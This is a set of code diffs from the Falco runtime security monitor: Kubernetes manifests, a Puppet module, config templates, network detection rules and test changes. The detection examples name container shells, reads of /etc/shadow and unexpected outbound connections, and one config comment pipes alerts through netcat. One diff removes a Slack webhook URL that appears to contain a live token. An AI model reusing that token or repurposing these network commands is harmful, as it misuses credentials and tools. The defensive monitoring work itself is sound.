falco-74htl 1/1 Running 0 13h
falco-fqz2m 1/1 Running 0 13h
falco-sgjfx 1/1 Running 0 13h
k8s-using-daemonset$ kubectl exec -it falco-74htl bash
root@falco-74htl:/# exit
k8s-using-daemonset$ kubectl logs falco-74htl
{"output":"17:48:58.590038385: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-74htl container=a98c2aa8e670 shell=bash parent=<NA> cmdline=bash terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2017-12-20T17:48:58.590038385Z", "output_fields": {"container.id":"a98c2aa8e670","evt.time":1513792138590038385,"k8s.pod.name":"falco-74htl","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}
k8s-using-daemonset$
```
Alternatively, you can deploy the [Falco Event Generator](https://github.com/draios/falco/wiki/Generating-Sample-Events) to have events generated automatically. Please note that this Deployment will generate a large number of events.
```
k8s-using-daemonset$ kubectl create -f falco-event-generator-deployment.yaml \
&& sleep 1 \
&& kubectl delete -f falco-event-generator-deployment.yaml
deployment "falco-event-generator-deployment" created
deployment "falco-event-generator-deployment" deleted
k8s-using-daemonset$
```

View File

@@ -0,0 +1,29 @@
apiVersion: v1
kind: ServiceAccount
metadata:
  name: falco-account
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: falco-cluster-role
rules:
  - apiGroups: ["extensions",""]
    resources: ["nodes","namespaces","pods","replicationcontrollers","services","events","configmaps"]
    verbs: ["get","list","watch"]
  - nonResourceURLs: ["/healthz", "/healthz/*"]
    verbs: ["get"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: falco-cluster-role-binding
  namespace: default
subjects:
  - kind: ServiceAccount
    name: falco-account
    namespace: default
roleRef:
  kind: ClusterRole
  name: falco-cluster-role
  apiGroup: rbac.authorization.k8s.io

View File

@@ -0,0 +1,63 @@
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: falco
  labels:
    name: falco-daemonset
    app: demo
spec:
  template:
    metadata:
      labels:
        name: falco
        app: demo
        role: security
    spec:
      serviceAccount: falco-account
      containers:
        - name: falco
          image: sysdig/falco:latest
          securityContext:
            privileged: true
          args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk"]
          volumeMounts:
            - mountPath: /host/var/run/docker.sock
              name: docker-socket
            - mountPath: /host/dev
              name: dev-fs
            - mountPath: /host/proc
              name: proc-fs
              readOnly: true
            - mountPath: /host/boot
              name: boot-fs
              readOnly: true
            - mountPath: /host/lib/modules
              name: lib-modules
              readOnly: true
            - mountPath: /host/usr
              name: usr-fs
              readOnly: true
            - mountPath: /etc/falco
              name: falco-config
      volumes:
        - name: docker-socket
          hostPath:
            path: /var/run/docker.sock
        - name: dev-fs
          hostPath:
            path: /dev
        - name: proc-fs
          hostPath:
            path: /proc
        - name: boot-fs
          hostPath:
            path: /boot
        - name: lib-modules
          hostPath:
            path: /lib/modules
        - name: usr-fs
          hostPath:
            path: /usr
        - name: falco-config
          configMap:
            name: falco-config

View File

@@ -18,14 +18,12 @@ spec:
          image: sysdig/falco:latest
          securityContext:
            privileged: true
          args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o", "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/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"]
          args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o", "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"]
          volumeMounts:
            - mountPath: /host/var/run/docker.sock
              name: docker-socket
              readOnly: true
            - mountPath: /host/dev
              name: dev-fs
              readOnly: true
            - mountPath: /host/proc
              name: proc-fs
              readOnly: true

View File

@@ -1,9 +1,7 @@
# Owned by software vendor, serving install-software.sh.
express_server:
  container_name: express_server
  image: node:latest
  working_dir: /usr/src/app
  command: bash -c "npm install && node server.js"
  command: bash -c "apt-get -y update && apt-get -y install runit && npm install && runsv /usr/src/app"
  ports:
    - "8181:8181"
  volumes:

View File

@@ -0,0 +1,2 @@
#!/bin/sh
node server.js

View File

@@ -0,0 +1,3 @@
# Example Puppet Falco Module
This contains an example [Puppet](https://puppet.com/) module for Falco.

View File

@@ -0,0 +1,7 @@
source 'https://rubygems.org'
puppetversion = ENV.key?('PUPPET_VERSION') ? "= #{ENV['PUPPET_VERSION']}" : ['>= 3.3']
gem 'puppet', puppetversion
gem 'puppetlabs_spec_helper', '>= 0.1.0'
gem 'puppet-lint', '>= 0.3.2'
gem 'facter', '>= 1.7.0'

View File

@@ -0,0 +1,241 @@
# falco
#### Table of Contents
1. [Overview](#overview)
2. [Module Description - What the module does and why it is useful](#module-description)
3. [Setup - The basics of getting started with falco](#setup)
    * [What falco affects](#what-falco-affects)
    * [Beginning with falco](#beginning-with-falco)
4. [Usage - Configuration options and additional functionality](#usage)
5. [Reference - An under-the-hood peek at what the module is doing and how](#reference)
6. [Limitations - OS compatibility, etc.](#limitations)
7. [Development - Guide for contributing to the module](#development)
## Overview
Sysdig Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by sysdig's system call capture infrastructure, falco lets you continuously monitor and detect container, application, host, and network activity... all in one place, from one source of data, with one set of rules.
#### What kind of behaviors can Falco detect?
Falco can detect and alert on any behavior that involves making Linux system calls. Thanks to Sysdig's core decoding and state tracking functionality, falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, you can easily detect things like:
- A shell is run inside a container
- A container is running in privileged mode, or is mounting a sensitive path like `/proc` from the host.
- A server process spawns a child process of an unexpected type
- Unexpected read of a sensitive file (like `/etc/shadow`)
- A non-device file is written to `/dev`
- A standard system binary (like `ls`) makes an outbound network connection
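As an illustration of the rule syntax behind these detections, a simplified sketch of the "shell is run inside a container" case might look like the following. This is only an example for orientation, not the rule shipped in `falco_rules.yaml`:
```
- rule: Example shell in container
  desc: Simplified illustration of detecting a shell spawned inside a container
  condition: evt.type = execve and container.id != host and proc.name = bash
  output: Shell spawned in a container (user=%user.name container=%container.id cmdline=%proc.cmdline)
  priority: WARNING
```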
## Module Description
This module configures falco as a systemd service. You configure falco
to send its notifications to one or more output channels (syslog,
files, programs).
## Setup
### What falco affects
This module affects the following:
* The main falco configuration file `/etc/falco/falco.yaml`, including:
  * Output format (JSON vs plain text)
  * Log level
  * Rule priority level to run
  * Output buffering
  * Output throttling
  * Output channels (syslog, file, program)
### Beginning with falco
To have Puppet install falco with the default parameters, declare the falco class:
``` puppet
class { 'falco': }
```
When you declare this class with the default options, the module:
* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system.
* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
* Starts the falco service.
## Usage
### Enabling file output
To enable file output, set the `file_output` hash, as follows:
``` puppet
class { 'falco':
file_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'filename' => '/tmp/falco-events.txt'
},
}
```
### Enabling program output
To enable program output, set the `program_output` hash and optionally the `json_output` parameters, as follows:
``` puppet
class { 'falco':
json_output => 'true',
program_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
}
```
## Reference
* [**Public classes**](#public-classes)
* [Class: falco](#class-falco)
### Public Classes
#### Class: `falco`
Guides the basic setup and installation of falco on your system.
When this class is declared with the default options, Puppet:
* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system.
* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
* Starts the falco service.
You can simply declare the default `falco` class:
``` puppet
class { 'falco': }
```
##### `rules_file`
An array of files for falco to load. Order matters--the first file listed will be loaded first.
Default: `['/etc/falco/falco_rules.yaml', '/etc/falco/falco_rules.local.yaml']`
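For example, to load an additional custom rules file after the defaults (the third path here is hypothetical):
``` puppet
class { 'falco':
  rules_file => [
    '/etc/falco/falco_rules.yaml',
    '/etc/falco/falco_rules.local.yaml',
    '/etc/falco/my_company_rules.yaml',
  ],
}
```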
##### `json_output`
Whether to output events in json or text.
Default: `false`
##### `log_stderr`
Send falco's logs to stderr. Note: these are not security notifications; they are logs from the falco daemon itself.
Default: `false`
##### `log_syslog`
Send falco's logs to syslog. Note: these are not security notifications; they are logs from the falco daemon itself.
Default: `true`
##### `log_level`
Minimum log level to include in logs. Note: these levels are
separate from the priority field of rules. This refers only to the
log level of falco's internal logging. Can be one of "emergency",
"alert", "critical", "error", "warning", "notice", "info", "debug".
Default: `info`
##### `priority`
Minimum rule priority level to load and run. All rules having a
priority more severe than this level will be loaded/run. Can be one
of "emergency", "alert", "critical", "error", "warning", "notice",
"info", "debug".
Default: `debug`
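As a sketch, the internal log level and the rule priority threshold can be raised together:
``` puppet
class { 'falco':
  log_level => 'warning',
  priority  => 'warning',
}
```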
##### `buffered_outputs`
Whether or not output to any of the output channels below is
buffered.
Default: `true`
##### `outputs_rate`/`outputs_max_burst`
A throttling mechanism implemented as a token bucket limits the
rate of falco notifications. This throttling is controlled by the following configuration
options:
* `outputs_rate`: the number of tokens (i.e. right to send a notification)
gained per second. Defaults to 1.
* `outputs_max_burst`: the maximum number of tokens outstanding. Defaults to 1000.
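For example, to keep the default rate but allow a smaller burst (the values are illustrative):
``` puppet
class { 'falco':
  outputs_rate      => 1,
  outputs_max_burst => 100,
}
```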
##### `syslog_output`
Controls syslog output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `true`.
Example:
``` puppet
class { 'falco':
syslog_output => {
'enabled' => 'true',
},
}
```
##### `file_output`
Controls file output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `false`.
* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
* `filename`: Notifications will be written to this file.
Example:
``` puppet
class { 'falco':
file_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'filename' => '/tmp/falco-events.txt'
},
}
```
##### `program_output`
Controls program output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `false`.
* `keep_alive`: If keep_alive is set to true, the program will be started once and continuously written to, with each output message on its own line. If keep_alive is set to false, the program will be re-spawned for each output message. Default: `false`.
* `program`: Notifications will be piped to this program.
Example:
``` puppet
class { 'falco':
program_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
}
```
## Limitations
The module works wherever falco runs as a daemonized service (generally, Linux only).
## Development
For more information on Sysdig Falco, visit our [github](https://github.com/draios/falco) or [web site](https://sysdig.com/opensource/falco/).

View File

@@ -0,0 +1,18 @@
require 'rubygems'
require 'puppetlabs_spec_helper/rake_tasks'
require 'puppet-lint/tasks/puppet-lint'
PuppetLint.configuration.send('disable_80chars')
PuppetLint.configuration.ignore_paths = ["spec/**/*.pp", "pkg/**/*.pp"]
desc "Validate manifests, templates, and ruby files"
task :validate do
  Dir['manifests/**/*.pp'].each do |manifest|
    sh "puppet parser validate --noop #{manifest}"
  end
  Dir['spec/**/*.rb','lib/**/*.rb'].each do |ruby_file|
    sh "ruby -c #{ruby_file}" unless ruby_file =~ /spec\/fixtures/
  end
  Dir['templates/**/*.erb'].each do |template|
    sh "erb -P -x -T '-' #{template} | ruby -c"
  end
end

View File

@@ -0,0 +1,13 @@
# == Class: falco::config
class falco::config inherits falco {
  file { '/etc/falco/falco.yaml':
    notify  => Service['falco'],
    ensure  => file,
    owner   => 'root',
    group   => 'root',
    mode    => '0644',
    content => template('falco/falco.yaml.erb'),
  }
}

View File

@@ -0,0 +1,31 @@
class falco (
  $rules_file = [
    '/etc/falco/falco_rules.yaml',
    '/etc/falco/falco_rules.local.yaml'
  ],
  $json_output       = 'false',
  $log_stderr        = 'false',
  $log_syslog        = 'true',
  $log_level         = 'info',
  $priority          = 'debug',
  $buffered_outputs  = 'true',
  $outputs_rate      = 1,
  $outputs_max_burst = 1000,
  $syslog_output = {
    'enabled' => 'true'
  },
  $file_output = {
    'enabled'    => 'false',
    'keep_alive' => 'false',
    'filename'   => '/tmp/falco_events.txt'
  },
  $program_output = {
    'enabled'    => 'false',
    'keep_alive' => 'false',
    'program'    => 'curl http://some-webhook.com'
  },
) {
  include falco::install
  include falco::config
  include falco::service
}

View File

@@ -0,0 +1,6 @@
# == Class: falco::install
class falco::install inherits falco {
  package { 'falco':
    ensure => installed,
  }
}

View File

@@ -0,0 +1,11 @@
# == Class: falco::service
class falco::service inherits falco {
  service { 'falco':
    ensure     => running,
    enable     => true,
    hasstatus  => true,
    hasrestart => true,
    require    => Package['falco'],
  }
}

View File

@@ -0,0 +1,14 @@
{
  "name": "sysdig-falco",
  "version": "0.1.0",
  "author": "sysdig",
  "summary": "Sysdig Falco: Behavioral Activity Monitoring With Container Support",
  "license": "GPLv2",
  "source": "https://github.com/draios/falco",
  "project_page": "https://github.com/draios/falco",
  "issues_url": "https://github.com/draios/falco/issues",
  "dependencies": [
    {"name":"puppetlabs-stdlib","version_requirement":">= 1.0.0"}
  ]
}

View File

@@ -0,0 +1,7 @@
require 'spec_helper'
describe 'falco' do
  context 'with defaults for all parameters' do
    it { should contain_class('falco') }
  end
end

View File

@@ -0,0 +1 @@
require 'puppetlabs_spec_helper/module_spec_helper'

View File

@@ -0,0 +1,96 @@
####
# THIS FILE MANAGED BY PUPPET. DO NOT MODIFY
####
# File(s) containing Falco rules, loaded at startup.
#
# falco_rules.yaml ships with the falco package and is overridden with
# every new software version. falco_rules.local.yaml is only created
# if it doesn't exist. If you want to customize the set of rules, add
# your customizations to falco_rules.local.yaml.
#
# The files will be read in the order presented here, so make sure if
# you have overrides they appear in later files.
rules_file:
<% Array(@rules_file).each do |file| -%>
  - <%= file %>
<% end -%>
# Whether to output events in json or text
json_output: <%= @json_output %>
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: <%= @log_stderr %>
log_syslog: <%= @log_syslog %>
# Minimum log level to include in logs. Note: these levels are
# separate from the priority field of rules. This refers only to the
# log level of falco's internal logging. Can be one of "emergency",
# "alert", "critical", "error", "warning", "notice", "info", "debug".
log_level: <%= @log_level %>
# Minimum rule priority level to load and run. All rules having a
# priority more severe than this level will be loaded/run. Can be one
# of "emergency", "alert", "critical", "error", "warning", "notice",
# "info", "debug".
priority: <%= @priority %>
# Whether or not output to any of the output channels below is
# buffered. Defaults to true
buffered_outputs: <%= @buffered_outputs %>
# A throttling mechanism implemented as a token bucket limits the
# rate of falco notifications. This throttling is controlled by the following configuration
# options:
# - rate: the number of tokens (i.e. right to send a notification)
# gained per second. Defaults to 1.
# - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
#
# With these defaults, falco could send up to 1000 notifications after
# an initial quiet period, and then up to 1 notification per second
# afterward. It would gain the full burst back after 1000 seconds of
# no activity.
outputs:
  rate: <%= @outputs_rate %>
  max_burst: <%= @outputs_max_burst %>
# Where security notifications should go.
# Multiple outputs can be enabled.
<% unless @syslog_output.nil? -%>
syslog_output:
  enabled: <%= @syslog_output['enabled'] %>
<% end -%>
# If keep_alive is set to true, the file will be opened once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the file will be re-opened
# for each output message.
<% unless @file_output.nil? -%>
file_output:
  enabled: <%= @file_output['enabled'] %>
  keep_alive: <%= @file_output['keep_alive'] %>
  filename: <%= @file_output['filename'] %>
<% end -%>
# Possible additional things you might want to do with program output:
# - send to a slack webhook:
# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
# - logging (alternate method than syslog):
# program: logger -t falco-test
# - send over a network connection:
# program: nc host.example.com 80
# If keep_alive is set to true, the program will be started once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the program will be re-spawned
# for each output message.
<% unless @program_output.nil? -%>
program_output:
  enabled: <%= @program_output['enabled'] %>
  keep_alive: <%= @program_output['keep_alive'] %>
  program: <%= @program_output['program'] %>
<% end -%>

View File

@@ -0,0 +1,12 @@
# The baseline for module testing used by Puppet Labs is that each manifest
# should have a corresponding test manifest that declares that class or defined
# type.
#
# Tests are then run by using puppet apply --noop (to check for compilation
# errors and view a log of events) or by fully applying the test in a virtual
# environment (to compare the resulting system state to the desired state).
#
# Learn more about module testing here:
# http://docs.puppetlabs.com/guides/tests_smoke.html
#
include falco

View File

@@ -14,6 +14,11 @@ rules_file:
# Whether to output events in json or text
json_output: false
# When using json output, whether or not to include the "output" property
# itself (e.g. "File below a known binary directory opened for writing
# (user=root ....") in the json output.
json_include_output_property: true
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: true

View File

@@ -5,6 +5,7 @@ endif()
if(NOT DEFINED FALCO_RULES_DEST_FILENAME)
set(FALCO_RULES_DEST_FILENAME "falco_rules.yaml")
set(FALCO_LOCAL_RULES_DEST_FILENAME "falco_rules.local.yaml")
set(FALCO_APP_RULES_DEST_FILENAME "application_rules.yaml")
endif()
if(DEFINED FALCO_COMPONENT)
@@ -17,6 +18,9 @@ install(FILES falco_rules.local.yaml
COMPONENT "${FALCO_COMPONENT}"
DESTINATION "${FALCO_ETC_DIR}"
RENAME "${FALCO_LOCAL_RULES_DEST_FILENAME}")
# Intentionally *not* installing application_rules.yaml. Not needed
# when falco is embedded in other projects.
else()
install(FILES falco_rules.yaml
DESTINATION "${FALCO_ETC_DIR}"
@@ -25,5 +29,9 @@ install(FILES falco_rules.yaml
install(FILES falco_rules.local.yaml
DESTINATION "${FALCO_ETC_DIR}"
RENAME "${FALCO_LOCAL_RULES_DEST_FILENAME}")
install(FILES application_rules.yaml
DESTINATION "${FALCO_ETC_DIR}"
RENAME "${FALCO_APP_RULES_DEST_FILENAME}")
endif()

View File

@@ -0,0 +1,169 @@
################################################################
# By default all application-related rules are disabled for
# performance reasons. Depending on the application(s) you use,
# uncomment the corresponding rule definitions for
# application-specific activity monitoring.
################################################################
# Elasticsearch ports
- macro: elasticsearch_cluster_port
  condition: fd.sport=9300
- macro: elasticsearch_api_port
  condition: fd.sport=9200
- macro: elasticsearch_port
  condition: elasticsearch_cluster_port or elasticsearch_api_port
# - rule: Elasticsearch unexpected network inbound traffic
# desc: inbound network traffic to elasticsearch on a port other than the standard ports
# condition: user.name = elasticsearch and inbound and not elasticsearch_port
# output: "Inbound network traffic to Elasticsearch on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Elasticsearch unexpected network outbound traffic
# desc: outbound network traffic from elasticsearch on a port other than the standard ports
# condition: user.name = elasticsearch and outbound and not elasticsearch_cluster_port
# output: "Outbound network traffic from Elasticsearch on unexpected port (connection=%fd.name)"
# priority: WARNING
# ActiveMQ ports
- macro: activemq_cluster_port
  condition: fd.sport=61616
- macro: activemq_web_port
  condition: fd.sport=8161
- macro: activemq_port
  condition: activemq_web_port or activemq_cluster_port
# - rule: Activemq unexpected network inbound traffic
# desc: inbound network traffic to activemq on a port other than the standard ports
# condition: user.name = activemq and inbound and not activemq_port
# output: "Inbound network traffic to ActiveMQ on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Activemq unexpected network outbound traffic
# desc: outbound network traffic from activemq on a port other than the standard ports
# condition: user.name = activemq and outbound and not activemq_cluster_port
# output: "Outbound network traffic from ActiveMQ on unexpected port (connection=%fd.name)"
# priority: WARNING
# Cassandra ports
# https://docs.datastax.com/en/cassandra/2.0/cassandra/security/secureFireWall_r.html
- macro: cassandra_thrift_client_port
  condition: fd.sport=9160
- macro: cassandra_cql_port
  condition: fd.sport=9042
- macro: cassandra_cluster_port
  condition: fd.sport=7000
- macro: cassandra_ssl_cluster_port
  condition: fd.sport=7001
- macro: cassandra_jmx_port
  condition: fd.sport=7199
- macro: cassandra_port
  condition: >
    cassandra_thrift_client_port or
    cassandra_cql_port or cassandra_cluster_port or
    cassandra_ssl_cluster_port or cassandra_jmx_port
# - rule: Cassandra unexpected network inbound traffic
# desc: inbound network traffic to cassandra on a port other than the standard ports
# condition: user.name = cassandra and inbound and not cassandra_port
# output: "Inbound network traffic to Cassandra on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Cassandra unexpected network outbound traffic
# desc: outbound network traffic from cassandra on a port other than the standard ports
# condition: user.name = cassandra and outbound and not (cassandra_ssl_cluster_port or cassandra_cluster_port)
# output: "Outbound network traffic from Cassandra on unexpected port (connection=%fd.name)"
# priority: WARNING
# Couchdb ports
# https://github.com/davisp/couchdb/blob/master/etc/couchdb/local.ini
- macro: couchdb_httpd_port
  condition: fd.sport=5984
- macro: couchdb_httpd_ssl_port
  condition: fd.sport=6984
# xxx can't tell what clustering ports are used. not writing rules for this
# yet.
# Fluentd ports
- macro: fluentd_http_port
  condition: fd.sport=9880
- macro: fluentd_forward_port
  condition: fd.sport=24224
# - rule: Fluentd unexpected network inbound traffic
# desc: inbound network traffic to fluentd on a port other than the standard ports
# condition: user.name = td-agent and inbound and not (fluentd_forward_port or fluentd_http_port)
# output: "Inbound network traffic to Fluentd on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Tdagent unexpected network outbound traffic
# desc: outbound network traffic from fluentd on a port other than the standard ports
# condition: user.name = td-agent and outbound and not fluentd_forward_port
# output: "Outbound network traffic from Fluentd on unexpected port (connection=%fd.name)"
# priority: WARNING
# Gearman ports
# http://gearman.org/protocol/
# - rule: Gearman unexpected network outbound traffic
# desc: outbound network traffic from gearman on a port other than the standard ports
# condition: user.name = gearman and outbound and not fd.sport = 4730
# output: "Outbound network traffic from Gearman on unexpected port (connection=%fd.name)"
# priority: WARNING
# Zookeeper
- macro: zookeeper_port
  condition: fd.sport = 2181
# Kafka ports
# - rule: Kafka unexpected network inbound traffic
# desc: inbound network traffic to kafka on a port other than the standard ports
# condition: user.name = kafka and inbound and fd.sport != 9092
# output: "Inbound network traffic to Kafka on unexpected port (connection=%fd.name)"
# priority: WARNING
# Memcached ports
# - rule: Memcached unexpected network inbound traffic
# desc: inbound network traffic to memcached on a port other than the standard ports
# condition: user.name = memcached and inbound and fd.sport != 11211
# output: "Inbound network traffic to Memcached on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Memcached unexpected network outbound traffic
# desc: any outbound network traffic from memcached. memcached never initiates outbound connections.
# condition: user.name = memcached and outbound
# output: "Unexpected Memcached outbound connection (connection=%fd.name)"
# priority: WARNING
# MongoDB ports
- macro: mongodb_server_port
  condition: fd.sport = 27017
- macro: mongodb_shardserver_port
  condition: fd.sport = 27018
- macro: mongodb_configserver_port
  condition: fd.sport = 27019
- macro: mongodb_webserver_port
  condition: fd.sport = 28017
# - rule: Mongodb unexpected network inbound traffic
# desc: inbound network traffic to mongodb on a port other than the standard ports
# condition: >
# user.name = mongodb and inbound and not (mongodb_server_port or
# mongodb_shardserver_port or mongodb_configserver_port or mongodb_webserver_port)
# output: "Inbound network traffic to MongoDB on unexpected port (connection=%fd.name)"
# priority: WARNING
# MySQL ports
# - rule: Mysql unexpected network inbound traffic
# desc: inbound network traffic to mysql on a port other than the standard ports
# condition: user.name = mysql and inbound and fd.sport != 3306
# output: "Inbound network traffic to MySQL on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: HTTP server unexpected network inbound traffic
# desc: inbound network traffic to a http server program on a port other than the standard ports
# condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
# output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
# priority: WARNING

File diff suppressed because it is too large

View File

@@ -30,6 +30,7 @@ class FalcoTest(Test):
        self.trace_file = os.path.join(self.basedir, self.trace_file)
        self.json_output = self.params.get('json_output', '*', default=False)
        self.json_include_output_property = self.params.get('json_include_output_property', '*', default=True)
        self.priority = self.params.get('priority', '*', default='debug')
        self.rules_file = self.params.get('rules_file', '*', default=os.path.join(self.basedir, '../rules/falco_rules.yaml'))
@@ -249,7 +250,11 @@ class FalcoTest(Test):
        for line in res.stdout.splitlines():
            if line.startswith('{'):
                obj = json.loads(line)
                for attr in ['time', 'rule', 'priority', 'output']:
                if self.json_include_output_property:
                    attrs = ['time', 'rule', 'priority', 'output']
                else:
                    attrs = ['time', 'rule', 'priority']
                for attr in attrs:
                    if not attr in obj:
                        self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr))
@@ -348,8 +353,8 @@ class FalcoTest(Test):
            trace_arg = "-e {}".format(self.trace_file)
        # Run falco
        cmd = '{} {} {} -c {} {} -o json_output={} -o priority={} -v'.format(
            self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.priority)
        cmd = '{} {} {} -c {} {} -o json_output={} -o json_include_output_property={} -o priority={} -v'.format(
            self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.json_include_output_property, self.priority)
        for tag in self.disable_tags:
            cmd += ' -T {}'.format(tag)

View File

@@ -319,7 +319,7 @@ trace_files: !mux
    detect_counts:
      - "Write below binary dir": 1
      - "Read sensitive file untrusted": 3
      - "Run shell in container": 1
      - "Run shell untrusted": 1
      - "Write below rpm database": 1
      - "Write below etc": 1
      - "System procs network activity": 1
@@ -655,3 +655,19 @@ trace_files: !mux
      - rules/rule_append_false.yaml
    trace_file: trace_files/cat_write.scap
  json_output_no_output_property:
    json_output: True
    json_include_output_property: False
    detect: True
    detect_level: WARNING
    rules_file:
      - rules/rule_append.yaml
    trace_file: trace_files/cat_write.scap
    stdout_contains: "^(?!.*Warning An open of /dev/null was seen.*)"
  in_operator_netmasks:
    detect: True
    detect_level: INFO
    rules_file:
      - rules/detect_connect_using_in.yaml
    trace_file: trace_files/connect_localhost.scap

View File

@@ -43,11 +43,11 @@ traces: !mux
  falco-event-generator:
    trace_file: traces-positive/falco-event-generator.scap
    detect: True
    detect_level: [ERROR, WARNING, INFO, NOTICE]
    detect_level: [ERROR, WARNING, INFO, NOTICE, DEBUG]
    detect_counts:
      - "Write below binary dir": 1
      - "Read sensitive file untrusted": 3
      - "Run shell in container": 1
      - "Run shell untrusted": 1
      - "Write below rpm database": 1
      - "Write below etc": 1
      - "System procs network activity": 1
@@ -59,44 +59,6 @@ traces: !mux
- "Modify binary dirs": 2
- "Change thread namespace": 2
installer-fbash-manages-service:
trace_file: traces-info/installer-fbash-manages-service.scap
detect: True
detect_level: INFO
detect_counts:
- "Installer bash manages service": 4
installer-bash-non-https-connection:
trace_file: traces-positive/installer-bash-non-https-connection.scap
detect: True
detect_level: NOTICE
detect_counts:
- "Installer bash non https connection": 1
installer-fbash-runs-pkgmgmt:
trace_file: traces-info/installer-fbash-runs-pkgmgmt.scap
detect: True
detect_level: [NOTICE, INFO]
detect_counts:
- "Installer bash runs pkgmgmt program": 4
- "Installer bash non https connection": 4
installer-bash-starts-network-server:
trace_file: traces-positive/installer-bash-starts-network-server.scap
detect: True
detect_level: NOTICE
detect_counts:
- "Installer bash starts network server": 2
- "Installer bash non https connection": 3
installer-bash-starts-session:
trace_file: traces-positive/installer-bash-starts-session.scap
detect: True
detect_level: NOTICE
detect_counts:
- "Installer bash starts session": 1
- "Installer bash non https connection": 3
mkdir-binary-dirs:
trace_file: traces-positive/mkdir-binary-dirs.scap
detect: True
@@ -111,13 +73,6 @@ traces: !mux
    detect_counts:
      - "Modify binary dirs": 1
  modify-package-repo-list-installer:
    trace_file: traces-info/modify-package-repo-list-installer.scap
    detect: True
    detect_level: INFO
    detect_counts:
      - "Write below etc in installer": 1
  non-sudo-setuid:
    trace_file: traces-positive/non-sudo-setuid.scap
    detect: True
@@ -131,6 +86,7 @@ traces: !mux
    detect_level: WARNING
    detect_counts:
      - "Read sensitive file untrusted": 1
      - "Read sensitive file trusted after startup": 1
  read-sensitive-file-untrusted:
    trace_file: traces-positive/read-sensitive-file-untrusted.scap
@@ -146,13 +102,6 @@ traces: !mux
    detect_counts:
      - "Run shell untrusted": 1
  shell-in-container:
    trace_file: traces-positive/shell-in-container.scap
    detect: True
    detect_level: DEBUG
    detect_counts:
      - "Run shell in container": 1
  system-binaries-network-activity:
    trace_file: traces-positive/system-binaries-network-activity.scap
    detect: True
@@ -188,13 +137,6 @@ traces: !mux
    detect_counts:
      - "Write below etc": 1
  write-etc-installer:
    trace_file: traces-info/write-etc-installer.scap
    detect: True
    detect_level: INFO
    detect_counts:
      - "Write below etc in installer": 1
  write-rpm-database:
    trace_file: traces-positive/write-rpm-database.scap
    detect: True

View File

@@ -0,0 +1,6 @@
- rule: Localhost connect
  desc: Detect any connect to the localhost network, using fd.net and the in operator
  condition: evt.type=connect and fd.net in ("127.0.0.1/24")
  output: Program connected to localhost network
    (user=%user.name command=%proc.cmdline connection=%fd.name)
  priority: INFO

Binary file not shown.

View File

@@ -88,7 +88,8 @@ void falco_engine::load_rules(const string &rules_content, bool verbose, bool al
// formats.formatter is used, so we can unconditionally set
// json_output to false.
bool json_output = false;
falco_formats::init(m_inspector, m_ls, json_output);
bool json_include_output_property = false;
falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property);
m_rules->load_rules(rules_content, verbose, all_events, m_extra, m_replace_container_info, m_min_priority);
}

View File

@@ -25,6 +25,7 @@ along with falco. If not, see <http://www.gnu.org/licenses/>.
sinsp* falco_formats::s_inspector = NULL;
bool falco_formats::s_json_output = false;
bool falco_formats::s_json_include_output_property = true;
sinsp_evt_formatter_cache *falco_formats::s_formatters = NULL;
const static struct luaL_reg ll_falco [] =
@@ -36,10 +37,11 @@ const static struct luaL_reg ll_falco [] =
{NULL,NULL}
};
